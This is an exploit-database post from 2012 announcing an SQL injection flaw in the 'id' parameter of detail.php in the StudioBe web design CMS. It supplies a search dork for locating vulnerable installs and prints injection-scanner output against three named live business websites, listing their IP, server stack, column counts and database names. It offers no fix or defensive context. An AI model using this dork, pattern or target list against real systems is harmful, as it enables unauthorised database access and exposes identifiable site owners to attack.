facebook facebook twitter rss

StudioBe sql injection Vulnerability

Author: The Black Devils , Published: 29-09-2012
# Exploit Title: StudioBe  sql injection Vulnerability
# Date: 08/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.d-signstudio.be/
# Category : [ webapps ]
# Dork : Design by StudioBe inurl:detail.php?id=
# Type : php
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\detail.php?id= sql injection
-------------------------------
# Demo site:

Analyzing http://www.sms-team.be/uk/detail.php?id=243
Host IP: 62.213.196.138
Powered-by: PHP/5.2.8
Powered-by: ASP.NET
Keyword Found: juni
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 11
Valid String Column is 6
Current DB: smssql
#########
Analyzing http://www.agrilemahieu.be/detail.php?id=26
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.8
Powered-by: ASP.NET
Keyword Found: 17&18
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 7
Valid String Column is 2
Current DB: lemahieusql
#########
Analyzing http://www.b-tt.be/eng/detail.php?id=341
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.8
Powered-by: ASP.NET
Keyword Found: IVECO
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 11
Valid String Column is 1
Current DB: bttsql



#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios

Like us on Facebook :